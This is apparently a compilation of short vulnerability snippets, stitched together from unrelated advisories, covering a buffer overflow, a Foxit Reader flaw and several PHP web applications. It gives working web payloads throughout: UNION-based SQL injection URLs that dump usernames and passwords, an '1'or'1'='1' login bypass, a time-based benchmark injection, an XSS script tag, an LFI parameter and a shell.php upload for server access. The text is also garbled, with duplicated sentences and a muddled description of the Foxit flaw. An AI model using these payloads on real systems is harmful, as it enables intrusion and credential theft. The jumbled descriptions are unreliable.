The application has a classic buffer overflow vulnerability, which can be triggered by passing an overly long argument as a startup parameter. Shellcode can be run via a classic ret overwrite or an SEH handler overwrite.
A classic buffer overflow vulnerability can be triggered by passing an overly long argument as a startup parameter. Shellcode can be run via a classic ret overwrite or an SEH handler overwrite.
A vulnerability exists in Foxit 4.1.1 which allows an attacker to execute arbitrary code. The vulnerability is caused by a boundary error within the processing of the 'FoxitReader.exe' file. This can be exploited to cause a stack-based buffer overflow by, e.g., enticing a user to open a specially crafted .exe file. Successful exploitation may allow execution of arbitrary code.
An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable URL parameter. For example, http://127.0.0.1/[path]/index1.php?page=-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--
http://target/path/takefreestart.php?tid=242&tid2=-1+union+select+1,2,3,group_concat(user_name,0x3a,user_pass),5,6,7,8+from+admin--&nxtq=true&q_no=1
Go to /signinform.php and sign in with Username: admin and Password: 1'or'1'='1
Multiple scripts and parameters are affected by remote SQL injection vulnerabilities. You can also manipulate SQL queries with the help of various search fields of this web app. Some example URLs:
index.php?controller=app_oneorzerohelpdesk_main&subcontroller=search_management_manage&option=saved_search&global=1&id=[SQL Injection]
index.php?controller=app_oneorzerohelpdesk_main&subcontroller=search_management_manage&option=show_item_search&item_types=[SQL Injection]
index.php?controller=[LFI]&subcontroller=app_oneorzerotimemanager_manage&option=show_report
This vulnerability can be tricky to exploit. If OpenBaseDir is set, you can at least view files in the directory of this web software.
ccBoard doesn't filter its posts for HTML... at all: <script>prompt(1)</script>
NOTE: must be logged in
?option=com_ccboard&view=myprofile&cid=63 and benchmark(5000000,md5(1))
An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The crafted query can be sent via the 'p' parameter in the 'index.php' script. The query will be executed in the context of the application and can be used to extract sensitive information from the database.
EasyJobPortal has a remote file upload vulnerability. An attacker can register on the website, create a new document and upload a malicious shell.php file. The attacker can then access the shell.php file by editing the document. This allows the attacker to gain access to the server.